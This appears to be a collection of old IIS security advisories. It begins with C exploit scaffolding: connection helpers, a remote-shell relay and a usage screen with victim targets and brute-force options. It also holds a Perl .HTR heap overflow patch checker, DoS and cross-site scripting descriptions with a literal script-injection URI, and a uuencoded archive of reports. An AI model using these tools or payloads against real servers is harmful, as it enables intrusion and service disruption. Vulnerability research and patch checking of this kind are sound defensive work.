	/* Dotted quad or host name -> network-order IPv4 address. */
	in_addr_t resolve(char *IP)
	{
	    struct hostent *info;
	    in_addr_t ip;

	    if ((ip = inet_addr(IP)) == INADDR_NONE)
	    {
	        if ((info = gethostbyname(IP)) == 0)
	        {
	            printf("Couldnt resolve [%s]\n", IP);
	            exit(0);
	        }
	        memcpy(&ip, info->h_addr, 4);
	    }
	    return ip;
	}

	/* TCP connect with a 10 second timeout (non-blocking connect + select). */
	int make_connection(char *address, int port)
	{
	    struct sockaddr_in server, dest;
	    int s, i, bf;
	    socklen_t len;
	    fd_set wd;
	    struct timeval tv;

	    s = socket(AF_INET, SOCK_STREAM, 0);
	    if (s < 0)
	        return -1;
	    memset((char *)&server, 0, sizeof(server));
	    server.sin_family = AF_INET;
	    server.sin_addr.s_addr = htonl(INADDR_ANY);
	    server.sin_port = 0;

	    memset(&dest, 0, sizeof(dest));
	    dest.sin_family = AF_INET;
	    dest.sin_addr.s_addr = resolve(address);
	    if (dest.sin_addr.s_addr == 0)
	    {
	        close(s);
	        return -2;
	    }
	    dest.sin_port = htons(port);
	    bf = 1;
	    ioctl(s, FIONBIO, &bf);
	    tv.tv_sec = 10;
	    tv.tv_usec = 0;
	    FD_ZERO(&wd);
	    FD_SET(s, &wd);
	    connect(s, (struct sockaddr *)&dest, sizeof(dest));
	    if ((i = select(s + 1, 0, &wd, 0, &tv)) == (-1))
	    {
	        close(s);
	        return -3;
	    }
	    if (i == 0)
	    {
	        close(s);
	        return -4;
	    }
	    len = sizeof(int);
	    getsockopt(s, SOL_SOCKET, SO_ERROR, &bf, &len);
	    if ((bf != 0) || (len != sizeof(int)))
	    {
	        close(s);
	        errno = bf;
	        return -5;
	    }
	    /* bf is 0 here, so this switches the socket back to blocking mode. */
	    ioctl(s, FIONBIO, &bf);
	    return s;
	}

	/* Plain blocking connect to host:port; -1 on failure. */
	int open_back(char *host, int port)
	{
	    int sock, err;
	    struct sockaddr_in server_addr;
	    struct hostent *he;
	    he = gethostbyname(host);
	    if (he == NULL) return -1;
	    memset(&server_addr, 0, sizeof(server_addr));
	    server_addr.sin_family = AF_INET;
	    server_addr.sin_port = htons(port);
	    server_addr.sin_addr.s_addr = resolve(host);

	    sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
	    if (sock == -1) return -1;
	    err = connect(sock, (struct sockaddr *)&server_addr, sizeof(server_addr));
	    if (err == -1) { close(sock); sock = -1; }
	    return sock;
	}

	/* Relay: socket output to stdout, stdin to the socket. */
	void l33thax0r(int sock)
	{
	    char buf[1024];
	    fd_set rset;
	    int i;
	    while (1)
	    {
	        FD_ZERO(&rset);
	        FD_SET(sock, &rset);
	        FD_SET(STDIN_FILENO, &rset);
	        select(sock + 1, &rset, NULL, NULL, NULL);
	        if (FD_ISSET(sock, &rset))
	        {
	            i = read(sock, buf, sizeof(buf) - 1);
	            if (i <= 0)
	            {
	                printf("Fuck... the connection was closed!\n");
	                printf("exiting...\n\n");
	                exit(0);
	            }
	            buf[i] = 0;
	            puts(buf);
	        }
	        if (FD_ISSET(STDIN_FILENO, &rset))
	        {
	            i = read(STDIN_FILENO, buf, sizeof(buf) - 1);
	            if (i > 0)
	            {
	                buf[i] = 0;
	                write(sock, buf, i);
	            }
	        }
	    }
	}

	void usage(char *name)
	{
	    int j = 0;

	    printf("Usage: %s <-h hostname> <-t target> [-p port] [-f path file] [-b step]\n", name);
	    printf("\nOptions:\n"
	           "  -h hostname  (www.iisvictim.com)\n"
	           "  -t target\n"
	           "  -p port      (default 80)\n"
	           "  -f path_file (default /iisstart.asp)\n"
	           "  -b step      (brute force, try step 2000)\n\n"
	           "Available targets:\n\n");
	    while (target[j].def != 666)
	    {
	        printf("  %d ] - %s -\n", target[j].def, target[j].descr);
	        j++;
	    }
	    printf("\n");
	    exit(1);
	}

	

	

	

	 Problem n°5

	 ===========

	

	 Buffer overrun in HTR ISAPI extension

	

	

	This is a buffer overrun affecting the HTR ISAPI extension in IIS 4.0
	and 5.0. By sending a series of specially malformed HTR requests, it
	could be possible to either cause the IIS service to fail or, under a
	very difficult operational scenario, to cause code to run on the server.

	See the report by @Stake [http://www.atstake.com] in the file provided
	below.

	Microsoft IIS .HTR heap overflow checker by Filip Maertens
	[http://filip.compsec.be] (added 25 April 2002):
	

	

	#!/usr/bin/perl

	########################################################################
	# (c) Filip Maertens/CISSP, .HTR Heap Overflow checker.
	#
	# DISCLAIMER: This tool is only to be used for legitimate purposes only.
	# This is considered as an intrusive, so  please adhere to the laws  and
	# regulations applicable in your country.  Oh, and honey, there is pizza
	# in the fridge...
	#
	# CREDITS: @stake/KPMG for the advisory
	#          Thor Larholm for the patch identification remark
	#
	########################################################################

	use Socket;

	print "iischeck.pl | Microsoft .HTR Heap Overflow Checker | <filip\@securax.be>\n-----------------------------------------------------------------------\n";

	$host   = $ARGV[0];
	$method = $ARGV[2];          # "iischeck host -method N": N indexes @requestmethod
	$method = 0 unless defined $method;
	my $target = inet_aton($host);
	$port = 80;

	$requestmethod[0] = "GET";
	$requestmethod[1] = "HEAD";
	$requestmethod[2] = "POST";

	# Initializing strings & vars
	# The strings below are what the script looks for on line 49 of the
	# reply to tell a patched server from an unpatched one.

	$patchedstring    = "InsertElementAnchor";
	$nonpatchedstring = "document.write";
	$bogusurl         = "/xxxiischeckxxx";

	# Main loop of rotten code

	if ($host ne "") {

	  print " -- Checking hostname: $host\n";

	  $rawrequest = "$requestmethod[$method] $bogusurl HTTP/1.1\nClient-Agent:iischeck.pl\nHost:$host\r\n\r\n";
	  @results = sendrequestandgetanswer($rawrequest);

	  $criticalline = $results[49];   # 49, since HTTP headers are included

	  if ($results[2] =~ "IIS") {

	    SWITCH: {
	      if ($criticalline =~ $nonpatchedstring) { $patched = " -- Status: System vulnerable.";       last SWITCH; }
	      if ($criticalline =~ $patchedstring)    { $patched = " -- Status: System MS02-18 patched."; last SWITCH; }
	      $patched = " -- Status: Cannot identify patch level";
	    }

	    print "$patched\n\n";

	  } else {

	    print " -- Error: System is not a Windows/IIS host.\n\n";

	  }

	} else {

	  showusage();

	}

	exit(0);

	#######: Functions used by iischeck.pl :#######

	sub showusage
	{
	  print "Usage: iischeck [hostname] -method [method]\n";
	}

	sub sendrequestandgetanswer
	{
	  my ($rawrequest) = @_;
	  @lines = sendrawandgetanswer($rawrequest);
	  return @lines;
	}

	# Send a raw request and return the whole reply, one line per element
	# (element 0 is an empty placeholder, which the index 49 above accounts for).
	sub sendrawandgetanswer
	{
	  my ($pstr) = @_;
	  socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp') || 0) || die(" -- Error in creating socket\n");
	  if (connect(S, pack "SnA4x8", 2, $port, $target))
	  {
	    my @in = "";
	    select(S);
	    $| = 1;
	    print $pstr;
	    while (<S>)
	    {
	      push @in, $_;     # read to EOF: the line checked sits well past the headers
	    }
	    select(STDOUT);

	    return @in;
	  }
	  else
	  {
	    die(" -- Error connecting to: $host\n");
	  }
	}

	# Fire-and-forget variant; not called by the checker itself.
	sub sendraw
	{
	  my ($pstr) = @_;
	  socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp') || 0) || die("Socket problems\n");
	  if (connect(S, pack "SnA4x8", 2, $port, $target))
	  {
	    my @in = "";
	    select(S);
	    $| = 1;
	    print $pstr;

	  }
	  else
	  {
	    die("connect problems\n");
	  }
	}

	

	

	 Problem n°6

	 ===========

	

	 Access violation in URL error handling

	

	

	This is a denial of service vulnerability involving the way IIS 4.0,
	5.0, and 5.1 handle an error condition from ISAPI filters. At least one
	ISAPI filter (which ships as part of FrontPage Server Extensions and
	ASP.NET), and possibly others, generates an error when a request is
	received containing a URL that exceeds the maximum length set by the
	filter. In processing this error, the filter replaces the URL with a
	null value. A flaw results because IIS attempts to process the URL in
	the course of sending the error message back to the requester,
	resulting in an access violation that causes the IIS service to fail.
	

	Peter Gründl of KPMG Denmark added:
	

	Frontpage contains URL parsers for dynamic components (shtml.exe/dll).
	If a malicious user issues a request for /_vti_bin/shtml.exe where the
	URL for the dynamic contents is replaced with a long URL, the submodule
	will filter out the URL, and return a null value to the web service URL
	parser. An example string would be 35K of ascii 300. This will cause an
	access violation and Inetinfo.exe will be shut down. Due to the nature
	of the crash, we do not feel that it is exploitable beyond the point of
	a Denial of Service.
	

	See the report by @Stake [http://www.atstake.com] in the file provided below.
	

	

	 Problem n°7

	 ===========

	

	 Denial of service via FTP Status request

	

	

	This is a denial of service vulnerability involving the way the FTP
	service in IIS 4.0, 5.0 and 5.1 handles a request for the status of the
	current FTP session. If an attacker were able to establish an FTP
	session with an affected server, and levied a status request that
	created a particular error condition, a flaw in the FTP code would
	prevent it from correctly reporting the error. Other code within the FTP
	service would then attempt to use uninitialized data, with an access
	violation as the result. This would disrupt not only FTP services, but
	also web services.
	

	

	 Problem n°8,9,10

	 ================

	

	 Cross-site Scripting in IIS Help File search facility, HTTP Error Page, and Redirect Response message

	

	

	A trio of Cross-Site Scripting (CSS) vulnerabilities affecting IIS  4.0,
	5.0 and 5.1:  one  involving  the  results  page  that’s  returned  when
	searching the IIS Help Files, one involving HTTP error  pages;  and  one
	involving the error message that’s returned to advise that  a  requested
	URL has been redirected. All of  these  vulnerabilities  have  the  same
	scope and effect: an attacker who was able to lure a user into  clicking
	a link on his web site could relay a  request  containing  script  to  a
	third-party web  site  running  IIS,  thereby  causing  the  third-party
	site’s response (still including the script) to be  sent  to  the  user.
	The script  would  then  render  using  the  security  settings  of  the
	third-party site rather than the attacker’s.
	

	See report by Joe Smith and zenomorph [http://www.cgisecurity.com]  for
	the Help File search CSS in the file provided below.
	

	Credit goes to Keigo Yamazaki of the LAC SNS Team
	[http://www.lac.co.jp/security/] for the redirect response message CSS:
	

	  When a request is submitted to IIS, it returns a "302 Object Moved" 

	  error message to the client without changing the metacharacters 

	  contained in the request.  This occurs when the request contains the 

	  following URI:  

	

	  GET /existing directory name?"><script>alert("aaa"); </script>

	

	See report by Thor Larholm of Jubii A/S [http://www.jubii.dk/] for  the
	HTTP Error page CSS in the file provided below.
	

	

	UUEncoded file
	

	begin 644 reports.zip

	M4$L#!!0````(`$-HBRP8(/:4/`8``)\\,```-````<F5P;W)T7S$P+G1X=(U7

	M;6_;-A#^+D#_X>\"A:((ZLI.VV.:^H&GC(1F2+HC=8<6V#[1TMIA(HD!2=OSO

	M]QQI.R]-L39%;(GD\\>ZYYYZ[G)U-2%6563GJ&KUDZU1%GZQQ;J(]3W*K6Z^;

	M19K,K:EI1-/2V`_7W4SKK+BA/7FD<V5+4]7[:2(_]U^1X[RSVJ])%4OMC%W3

	M]/RGX?`P30Y^Y)_8^[BF^R;[=,)-K>Q-EB:\'0SINK:[H:#@\\DKVGTXMSFAM;

	M*S^BTOMV-!A<NQ`$W!W`B<\'T\'-</@J.FU?F(SGX,@8SDS(EVN<&>-17*\\X@.

	M7]*%LGD9/,ADQX2QC(A\'=,&%[FIY=SR?<^ZY(-6VE<Z5UZ9QH^]A$$XTZ^\"8

	M;IR\'<^$$^5)Y*HWS#E^9\"IZKKO+T:OB*V%I`U*H%NPQP:8>3>=45[$;!;[\'U

	MBN+GZ^UG=AC7ZE;E_LZ=$(5G52%JRHVYT>PHI%]MO\'(`ID^Y8\'10F%KIAMP6

	M)_+FX;XT*?6URF]D[=1X[*ZPH:!+Y5QKK\">5YZ9KO.L35[Q4P0BRNL03PD&H

	MUG2+$ICD\'B__@DMU:QH.)^Y,\"R(7D\\]`W3EN%FPIKS0VP:K/8_+.&F]-T>4\"

	MYF/T9?W;I!.`5.39UA%\\X(FE&<<$Z.::@S$R\\PT`<*Y@,@WJQ5C6BR9@@)P<

	M4V!-I6^X6F,S-\\IJ(_97)5O&+34`S[7I\'((W\"ZOJ&C&L3%<5:1)OVAHGSD#\'

	M,F*9`0[!W$G&8&:IX5+MMHGK1VY++*6N![@K3;`[XA:BV![@F)F8#`%L>H]C

	M#WB(:`,W\';G.M0+!K.+@0X=*4/1I,HF$O*N9SKEO0)>U<4`%]W,PR4VX\'34(

	M,Z?3Z>4=N27V/FE/*UU55&C75@JR0CW9T1@OB\'=-T0M%$-V\'@U$0--SK\'++V

	M@*6F\\VT\'^B$IS8V\\$#0FXZL_QU?9]/P$AD!.Q(K7:?+EZKP?:#M;@_AJ\'HPH

	MDO`U@%D\'U4&%8Y\\XB:M;D&D+S*88TT39F?96V?4=7^H:9AV%^N80KT30ER?+

	MN`U,F55!@I_@)T[=+S:)^VQ.*Z8*Z2<5Q\"$K?2VO`G!`2N=\"-XE.YUVEK,3/

	M$JA`\'.4B30J3=S7*)UM!S\'B/GK\\]IM.K\\6_O>L_I!:$,5,M[G:TL._!C\'^^>

	M]][+TB8S\\3V]2)/>VX%ZW]M_`YMQZ2HN`:*\"I<R+*\"X2_5Q;MR%;DP>?(.!X

	M#HL\"+<@!DH:,-\'S[<.M@E_6:5>-BQ6[C+M7R?B:0?/N@9&<L!1ON:94O`SQI

	M$K,O-T-532B.&@KN2KR6TN7OVMOX_%$YG4.Z.CS`]2C]]YE%@5BS+G@:P]^Z

	M&D$.^=W0+$WR4EF(M13(Y@:Y#?*\"30/:K<:8&71]F([6HLI]9Z%!X\"*6HW&5

	MHS;\"D=Q8VR$&L7SR>1)HU+61^2N.G`109!E6\\^!<F@0#..^E^*?\'\'VGOV?#7

	M?=K:\'\\2E9Z\\_W1[-:>\\?_(9!MTM-L6Y4#6@J<0KF<4433!,RS+:!K$D%[T<U

	M&=^VE=\'WVE70D4VO?ZOK!>YV-G_7Z^$+VH1HQ[O>CLXQ1^[OX;^9[\'IV]+,<

	M%=]>JNCALS0)GW=S0WP/&??9M<.)-[WW<>W#US^^!*T83$S-GTTSOM7\"1W\\)

	M\"D4!53.,\"S\'.+54$%[[%8.3YB1EE<XU4]M8Z6BA:PE(7*)5`ZNU\"D&\"V4D(0

	M\"@#V>&2(D$U,U3WN>6\'(P#2RWC3.X=\'!\\/`7X3XD?&\\\'Z&JURI`;\"(^9>VDU

	M\\\"\\O&_:#[60WF\'55Q1\"CP=9(IEQ+^WT\"30KT<(]:?7)<*0%$Q78GV%]-!_ZA

	MWZ%E.2.\"\'7PSK4P)&,TP1:(J:G7#M$:Y.:[FX%LC<H;^XB$A,)TF3]H>-\\4!

	M#*)L<N&52&JTWIN49@4!PJA0`(S0<^(P56.0D\'FJ!P]\"U:+@SL:;EL8U)C@(

	M>8\"5\'D]R8=B(=2P=QIL%2^60`TNDNYOY`?[G!C1\'K?&M@JAP&`AIHN7[B,ZU

	MC\'D2YVX$P_UH.$!T-W-<;#-#<0ISF9@X+I8BB<6(<.U&([XSQ(7]F)I&)$VZ

	M,M(CPYTR2<$_#S6!W/DL#O:,E`A^,TB5-%MI,/\\W9<O/%2^4+=S#OPW2Y\'?Y

	M,X*.!Q,ZH#/I^N`57>Z&\'SGY\'U!+`P04````\"``F9XLLW$%K[N8!``!L`P``

	M#````\')E<&]R=%\\V+G1X=+5236O;0!\"]\"_0?YE8\'7\"GMJ9B:UJ2E-6W`-(;2

	MXT@:64/6NV)GUJKRZSOK)(TO/58(@78>^[YFO?Z/3UF4Q=UN^^TSG\"@*!P^1

	M\'*%0!SJ@0D=*K0I47_<_`\'T\'V[O-;@O!T+T+D\\!\"B,JBC^$(*^B0E=Q\'5%&\\

	MIZJUP\\4G/!%L\\OE5)BN+C8(+_@`.19?P2,X\"P;<$>$#V@,ZNS@H\"-`1C:ARW

	M%>P\'0]FK0R9,#P\\4H8V$FE7?L\\(6IAB4\'H7W[+LS]E_2R^*4G*>(#3M6)H&.

	MI4V2K0\\4:546@^JXJNMIFJHCMS%(Z#6;JBV3P9/6&HE.3%/=48_):84R?DC1

	MK?\\BA-H46>>Z2<Z1LJ]O[Z[?OKY^\\RYCR\\)T&4^F@PNVBP#K2$(8VZ\'&[L02

	MHBDMB\\7>C-T^:X*GT0Q&%LFKF^\'(@JJ1FZ24<[#@+OW.%FY9W`S1SG_.$D9T

	MP%Z4L(/0PY%@];XZ%[;Q\\X2S+,]9>II>&L,3LL/&$2RL-`DI6H-MZ`CZ$(]6

	MJ)NO(&]&6<C(9N<18L,#51;.$O\"Y4(AHWPCT6\\D+V\\;<#.@/Y,*A@JV^$A@C

	MJ<YED83ZY#(#\',CL<`L3-8#C\")@Z*](VRZZ=R#GP8:JRA5\\D%XLFRC;[LOM^

	MGKVL9_[[`U!+`P04````\"``:9XLL!=^5WO<\'``\"M$P``#````\')E<&]R=%\\U

	M+G1X=*58VVX;R1%])\\!_Z+?8`#64M#)V0^1BKK0)B*P=071LY,EH]M1H.AI.

	MSW;WB&*^/J>J>\\BA+\'LW6!F6.)>NRZE3-[X-43^0TN6C#<[O%ZJHHU<UZ4ZY

	M1_)5XW;*MFJU6JNKXESIME1OBO/II/)NJQ;J3_F@I?!61Y%5&+?]RW3\"_]3P

	M,_KXXL];.3E3J]84WWYWM]L5(T7??\'E-IO<V[M4R>Y>L&J[4>[VEW^RPNJ.&

	M=\"!UHR-.G5_-+\\[GE^?GEVS\"LNL::W2TKEVH=]9X%UP5X4XDWQ)_J)S?RG-8

	MY:&\'A<^38/ZY;73D5\\:G/]FV=+N@WG_@EV>\':R@=CJT)HN#A0BV5IZV+I/H`

	MX4:WBI[@/FYHO[\'1:_B[U::V+2GC2CH\"!Y-B3>JQ;UKR>M.0\"F)A<8S:LH^U

	M\\PNX_DAJ:2,UZE6I^>\\XZ*^GDX\\$$[U:1QW[L%#YLM9!;?JFH0A@&=!.1U//

	MH(?4A@#X=\'+]\\2=UC4>V%\'2OE^_/&-NS\\_/O+[(==U21I];@\\3,2S#T%TM[4

	M\\R,;)31S?7YUP6(NBO@44_3_\"=<>+>T6?\'$`^P_AF\\%Z!3J\\5C8HK7:TR0`!

	M-@VAN-MI\'Y6K!,?3J(F[X\\`-9UT\'L(\'\'_702]B\'2MF![5BD6)56Z;Z*0T+;P

	MLVG$G%DB:]6WAB]UP^2&?FHY;F6AY#F2TS8$6[VPH42$F[V\"3_(?]I]M--_N

	M=`@[YTO%\\,6`TQ]J(`SBV!##=**_S`HV+CL`W#O74AL%!K9\"=$6\'<+=E`X)Y

	M^J4G2.)[R6XVBVF%\'`QJ9V.MMB[$4S5A!H&0=JJ;\";VA@XK,;=CX(KD+]0S(

	M4Q!%/IS&DX!\';*FD3I+*8<^NKOZUOOL\\\"`Y#-3$.3\'F*$K`/+&I(\'2OQ$+83

	MM8I3L[*\"__-RDIQ?WU[RC>F$=<$X@\'74(CG\"40S,K&7G;:,N9LRARR(Q^8:\"

	M\\;:3HB/D@8[0=YWS<&NKV[TJ;24Y$P5Z%?<=`=[0FYK%<DQF*7H<*NN!9PYN

	ML\"6ISCM#(8\"CA?I44W+\"D[$H.IP).;[\"*ITTB%OP9CJ1@`,E:D/&G`X\'.+K\"

	MD5)M]CBZ6B]O5^.75^MWQ<W//XN?HCF+\'PG(=H@$29.H`)=Y\"(FC`@Q`Z#J8

	MSPR<3N2QLBE+#\\J&\\B?R<]@\'-=LA!.WQ?>1[^Y(*9,^J8BM*AQ/XR]E%X40>

	MJW*0AE\"=>IR2L_=XV9_`?DP;R%6MBTJ;V(/)>]42,7,<IT7\'&=S&P9=44$3H

	M6\'UZ=X3\\&.;U,\\2X>(#HE;WO/=X>`BM8ZW)K6]0(+F\"/C!H*9Z4-%3GLQ_+#

	MXE+&RMFDCU4/B1F`QTFYXR1Q*&&<)..L5:,\\:Y#@TO!0@[9H,=!P3!L/A*SA

	M&`2!IV]AA(*8+TG!S&<K&=<-X9[4ET))4O/QTID>\"B(4(.HGS0*F\'L:+:V96

	M`T`.:7C%C;V.L5O,Y]RLML-1:5>13(U&,Q^,GD?GFC`WM0B96QOPL=\"A&\\2]

	M^9WBWHSDB7.5:[C4YGJ>W=@P20;\\N.CH4)O027>!=]M)W\"FE4]\\3!:%(__^]

	MY=9HN\"5`99W85=J`4#&J#/YIS\\HM8SIAZ\'/Q$9H<A23;.J1Y98V*.CR$U+]J

	MR^6+TX3-$2GCX$F/QY3PO.)(/I8Y!\\=L3+D(SH+%,P@>=!X:&)I/\'Z3BG?8D

	MR\'$&V*D2^$\'_.\'&%0XC9^,\",B^[7NQ[W\\:>N<3;*$`;IOF_\'\'8X[VY#B0U/*

	MQ2@-?:DO)7`\'[]@*R&F353\\>,T_\"=G(.UZM/RW>?.0(]ST(8CPNE$FER,QP_

	M.STM=4\\J%%/K68V`&X:QX7P?FX^VGI)/Q@D,B-3LY2.V\"QL2CZ(@>=IC=8/1

	MH\\!(*\'T[\\91\\^,K<*\\`);SBE.9)BXE`?C:=48ICRJ*L10]&#PJ^MRF\\<!P-^

	MY3`OL.O>-1SX>Z^W7#A`.1L>.\'C9Q5QF:IZ<DZN$H*;F7K)\\KF*\',LM%CF!Q

	M;>_KW.7S#\'U\'`>-6H,40CL?C;&U#Z\'%8\'X=L88G-3^3(;Z\\>@Y#YNS4/X!<_

	M\'\"O\'2UJ\'.26A>:)SM`BEFKCXAATW;M<V3I=AGA<M5OO7_\'EU\\^?OOO_C=Q?J

	M2[%O?J_8\'RZO5()Z.KD;6HH0(H@7O-OMTXJ4G,\\>2WS^[7HA71HN$\';>:3!C

	M[\'&?6TL\'GK312L<>;5B@==I8N&Y4W.^&7JQ^!\'-W?#2E,8\\V8>B$\'.3CMN%D

	M7#B@`5:EDLBSR%W??JU=9[;**)K,?C[*8+24VDTOK1LP75HJORHJCI.>9`@]

	M&>IB<DHF02^C!&_.XM&`3!\\&`5_;2%2%O$1:P%=I@SDAKA$AZ/DX*@A6AK12

	M_?34.70K7+W\"0OEZO,D=\\N;_.`ZD_D,F\"MMAF;UO*0_KJ7^R`UP(0VXI<%\'(

	MGU>I0&F*&M;:D$\"QK6GZ,-HR>/?E3JU>91:;1P*+HZ?\"^?O7L]SRP`#PTI?V

	MO\\2-4_1RTHU&\'X>8;1,QA^U>HI.F%9GL3^KHEXMV2@)>(?`N6&`:043=NL::

	M_>(P0`S?%S$Y4_?-Y8`W?/1P7VKNP8>Q,9<ON^\'%\\.-)+1]K21U4Z4=M&R&@

	MCL^KEZ58,2YSF_?UL]+K*H:Y_#DS-0IPI/W9;A]<IYLS=OBLS#JX=,/5X[<!

	M?P.`6^</7X\"!\"@LUTO9KWS),)[=_OU7_H/VOG^KNN\\\\/M$?],8G&W=ZCS$=9

	MZ4Z^`5-+#$SR3-94#EPI0?T?4$L#!!0````(`%IGBRS;F+>]W`,``,4\'```,

	M````<F5P;W)T7S@N=\'ATC57!CMLV$+T;\\#\\,TD,:8\"-Y-TW1&DW;U$T0\'QH$

	MV:!!4?1`22.+-44*)&6M_SYO2-GQHILB,B\"8XG#FS9MY0Z+_?_ZFS4[3+=>C

	MU_%(+YN##LX?Z9L?Z9_E@K[F44VO[:_U3H?92U&[_C]GWW*<E&?ZR!7\"*5]W

	M],KNM.4K4K:A/W3M77!MI.WVEMZP&>BU-GPR?:UJ;03@5V\':P%6@6QUQOO9Z

	MB-KNZ(TS\'):+_/O-13AUHVV6B]^YYKYB3S>KU;5LOALKHVMZSX95X.7BY>\"U

	MD=T;V?V3;>-\\H(VS4=61+ST\\\\\\W92XX<Z%7;LIBM\'Z#@2K)=+C8NQ#5MJ1FM

	M=52-D6+\'1U+:/H[4>F9:/\\FA?=#.AK4LWKH#&X._%XS>%*LK>14)P9E3&`FK

	MWQ6KQ/7S8G61\"#:[&(=U64[35-CD52I8#MXU8QU#.7$5DO_RGFE_<I_K+;_K

	M@MYY5QE.ZP\\=!Z:3&Y+4U4P&54COX3IUJ%-!\'SH=TE_J%4R-<=-RH2RI\"-+W

	MH#HZBE[7>[@9`];:RI=.V[TX\":YG6>R$R<^\')N\\B\"HJRC7!YI%KU#()=G\\R\"

	M`(F=BH38/\".=H6A[<.;`(7G&J];*H!DYM3#[%,D!R^``))6P=J-IL`Y!5V9.

	M@78*@9*U:T^X6^=[%5%72;`A)Q84CP.\"P:CU:DP@F-\"-FD.D\"8P`$N(%M(9N

	MZ>C&QY?DYDVV$8Z6\"TFM=1)>XFHKYIYR12DG0*UF@/U)]Z#.UR_^50<54D76

	MRK\"/WS:N\'GLX+!K7HRV?_%S`\\;9%PI6[0Y(#B.ER@.0]FY$5?F=TA]%8]@K-

	M4>1FN2D@\\;NL24GO,`MK0OY,UD4-5(UP(!D,N:\\*VG2,JJ=/:@>.*DZ]`1;Q

	M(=92]\'(<=EXU?$GN\'#2K!OG>76Y\"`X_^XG\"5W,I>C5:KA#9,\"+0/A7$8G(\\7

	M\\B#D.%GC5!.(MJEE!N7C<C\'CA=@_2L=_3V&XIG%H5.3B$3VEC.\">/A^`\\R6=

	ME9\'KSG(L(\\;\"0?-4-MRJT<1\"A>&7T9L79XO3.\"ZKT1B&MLH^K&Z>KJY_$-M,

	MQ[,\"([_1$E0E3%L*$SI#4H!V)8\'^2$:AZ[XHUE!@=&6F)/$TT9)R.TQQ,5)H

	M8HWBTJ0Q=:$1MA31R\'GRRYE,:];[<\\)U,D;I\"P/.O\'AW%@KR>1[+\"9\"M3C=5

	MQ;6\"DN:1\"<!Q<D#L=PP)]H.R6EPE68<1\"O%9Z]*9<T]E\'%MD&MBT9/2>13][

	M\"\\%\"72!`V)?1C<14\'DL!F#&:HD@,C4^AA\\#/&(KS-1(Z`>Q2S/E>N;Q.-FXX

	M>KWKXL57N9\'O7Z6?`%!+`P04``(`\"`\"!4J8LLM^M-$<5``\"K-0``#````\')E

	M<&]R=%\\Q+G1X=*U;;5/;R);^C*O\\\'WJ\\E1E(\"2,;&YMDF#M,8`;JDI`\"9K*W

	MAE2J+;6P)K+D54L8[ZW[W_<YI[OU8EYR=VL=\'&RI^_0YSWGMH^93G(;92HNA

	M[_M\"IJ\'X<#,2Y^?7HG]\\_5%<J456*/%+&44J%Y?W*H^2;-7M1\'FV$&_$0N;!

	MSTJM53_`]^W>>WP7[V4<1;DJ>CO=#OW[]\']:H=NY4HF26HD36:@WW8[O[^$\'

	M1(9T\\UIA9%RL<>,LOIN+;4LGR$(EU(,*RB+.4G!P_NGX_9?WQ^_.SC^<BH]Y

	M?!\\GZDZ)\"\\Q/F-!:%VJAQ3\'6#PH5@N#[.,@SG46%<*Q_N!&COB_.TT+EJ2KP

	M(<KRA:0EQ+7*[^-`:1KQU%P6^^698YK9[9PH\'>3QDNZ]H>_\'XKY,4I7+69Q`

	M5!&GHI@K0:AM\'P=%?*^8!&#[*.^4WA\'GU\\<?ST44)UC,$TDF0Q6*V;K;\"54D

	MRZ006%0F\"2N`%-%B41M2VN*QG9=I&J=WI*D=3P0R%3/5[:B\'99+%P$D4F<@9

	M\\V1M`;?H9Q&(\"UD4,OBJ<BV\">08I^^(&O!LVDECI;F<5%W,K4J@PDQ8CKF+\"

	M:@D#,BB!\'$$F0EE(K!@HR$U2P?B2.(BS$J0\"4$P+W1>_K+%<F7X5*K44Z[DK

	MQ5+@0J#8_B!!!I%7L\",E1B!9$%O$?CZ+BUSF6`,2XA>Q6A\'1Y7*9K/NDH9MY

	MK`5^I`\"=-4%(_&RHC612IVN:>`<U%1HBRT+(<!&GL<8Z199CW3C5!2F\'\\*BM

	MB!>+(?!2%L%<2\"UT1EK48IEI\'<\\291D!MED\"SR&9U8-<+!,%MD%/S[,5$W5<

	M):2G-(P)W;X0G^RX$JXF:U/I2[W$HG\"51($/&4$IPO%(\'#QI/0P4%NMV$GBM

	M+O@ZM`]*P5?-K)X:YMZ8X/\"Z]?I%W<7D%Y`L2U]OO+J=CY?7-V(OCC6XR`OF

	M\\.SFYN/>H#^`MP2!6A9OQ.L]C#S+-#ZZR-3MO,M@5&FQ>[->JC=\"$J8!F]?>

	MP^YJM=HE*]DM\\X3-1H4`-)>I1D3:/;6&],88%MWK=@;PUX_\')ZV?;F<$%SZ^

	M.38?3J]O$+.ZG3\\5F?/GQH>V5*>PCF<$)I\'!B0KF*;A-Q&9\\(*4[56M#0L@9

	M3!IV#FUJZUI&G^J!X*$A<QAD`EW!_*W?VGC>=,@DF0-\"R!PGL+T\\0YC29\"QS

	ME;Y,ED($$R6O6+&)&/O*EIAJ[0,NLP!!6)<U@Y.+BS,HMW_ZGZ=B5QS7^A$J

	MS[/<R$K6EY<!7X8#^0^3213,]@\\G\"`M0%70\'/[$>R_?\'H_\'^:#P:T0H?LH+L

	MD%VOOD/.2^+,U0.((.AH:*F*.[V;Z].3GB>RW#B03$I@U2/=]B@:P[T+8*_@

	M3\":P(+\";.->4QZ+\'2^5K\\D\\@\'V3+-9&\"O?3HNR&*`*98=[1>#HEU^D,A.$\"Q

	MWSXEG(<`T^W(@->XC[/$LA\\$)8(O!1_BW2!7YD!H0V7$T/;UZ=F.U7^W0^.1

	M\\;Y2QDI@2P@\\T&9<,+&OT*7!S-B&M90^M%[9B3/.(\"\\?\"$=6.&Y\"A`4\'?Y?*

	M(AD41B7TS05;U0C+Q!-B<IF;\\(O`54C8@3A3<HE*(X4)+:`R*!#)+J_%U!ZM

	M0?,\"JB%FBL0$L\'!?I(YC1$K(I8C*]DY?7\"]5$$?D9,G:H^!:\\4`UA3$0HN]Q

	M$@$/>89`O<K@.+0$90[$\\Q#+DMM9/XJ-+>CF+0FE2JVS():40^MPN<R6I=4<

	MH4PF`.\"2+/LJ=8RDFB!3:)M#XQR>20OO-A<&;_,8*8(T2$RYR`#H\'9P(@90X

	MC=5YG+A2-]VHX4XA/<$V8Y/@F36M*%T\\7E!H@YJBE&T!,OED+A	**SULI-

	M8A7/;!I%O#\":KMU@74UEAV$8`7@-I8<\"PB3T96G0,`D<(JU7QGE29U&5A3TV

	MV;E$ZEVZLE\"3T,;PB@RR<\'Z7E%8U5-(N&*(R-:%HF7\'%0AQI><]HU\'&JNODX

